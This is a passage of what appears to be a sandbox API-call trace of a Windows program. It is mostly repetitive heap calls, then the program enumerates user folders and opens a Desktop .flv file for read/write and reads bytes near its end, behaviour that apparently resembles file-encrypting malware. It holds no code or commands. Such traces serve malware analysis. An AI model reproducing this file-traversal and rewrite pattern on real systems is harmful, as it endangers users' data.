(in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.122] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.122] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.122] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.122] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.122] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.123] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.123] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.123] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.123] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.123] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.123] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.123] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0170.123] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.123] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.123] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.123] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.123] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.123] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.123] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.123] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ba0 | out: hHeap=0xcd0000) returned 1 [0170.124] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ba0 [0170.124] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.124] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.124] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0170.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.126] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.126] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.127] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0170.127] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0170.127] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0170.127] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0170.127] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4bed8 [0170.127] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.127] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0170.127] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.127] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.127] PathFindFileNameW (pszPath="") returned="" [0170.127] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0170.127] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0170.128] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.128] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0170.128] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0170.128] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0170.128] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0170.128] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.128] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0170.128] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0170.128] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0170.128] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x38) returned 0x362b8e0 [0170.128] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0170.128] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0170.128] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.128] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0170.128] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x54) returned 0x36136d0 [0170.128] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f26d8 [0170.128] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0170.128] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0170.128] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0170.129] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.129] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ba0 [0170.129] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.129] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.129] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.129] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.129] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.129] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.129] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0170.129] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.129] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\") returned="5RddQRlUxLC956\\" [0170.129] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0170.129] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0170.129] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0170.129] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4bed8 [0170.129] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.129] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0170.129] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.130] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.130] PathFindFileNameW (pszPath="") returned="" [0170.130] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0170.130] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe986430, ftCreationTime.dwHighDateTime=0x1d5dc20, ftLastAccessTime.dwLowDateTime=0xe477ab20, ftLastAccessTime.dwHighDateTime=0x1d5e359, ftLastWriteTime.dwLowDateTime=0xe477ab20, ftLastWriteTime.dwHighDateTime=0x1d5e359, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0170.130] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe986430, ftCreationTime.dwHighDateTime=0x1d5dc20, ftLastAccessTime.dwLowDateTime=0xe477ab20, ftLastAccessTime.dwHighDateTime=0x1d5e359, ftLastWriteTime.dwLowDateTime=0xe477ab20, ftLastWriteTime.dwHighDateTime=0x1d5e359, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.130] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae90d7c0, ftCreationTime.dwHighDateTime=0x1d5e575, ftLastAccessTime.dwLowDateTime=0xadd0f950, ftLastAccessTime.dwHighDateTime=0x1d5d873, ftLastWriteTime.dwLowDateTime=0xadd0f950, ftLastWriteTime.dwHighDateTime=0x1d5d873, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1dBcNb8", cAlternateFileName="")) returned 1 [0170.130] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ebf0 [0170.130] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0170.130] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0170.130] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2a20 [0170.130] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e8c0 [0170.130] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.130] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbdcfd70, ftCreationTime.dwHighDateTime=0x1d5e7ce, ftLastAccessTime.dwLowDateTime=0x8870d880, ftLastAccessTime.dwHighDateTime=0x1d5d8fd, ftLastWriteTime.dwLowDateTime=0x8870d880, ftLastWriteTime.dwHighDateTime=0x1d5d8fd, nFileSizeHigh=0x0, nFileSizeLow=0xc141, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1YBskjnaQkYli5_rl5k.flv", cAlternateFileName="1YBSKJ~1.FLV")) returned 1 [0170.130] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0170.130] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa6) returned 0x35e3330 [0170.130] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\1YBskjnaQkYli5_rl5k.flv") returned=".flv" [0170.131] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\1YBskjnaQkYli5_rl5k.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\1ybskjnaqkyli5_rl5k.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.131] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=49473) returned 1 [0170.131] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.134] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xc11b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.134] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.136] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.136] ReadFile (in: hFile=0x664, 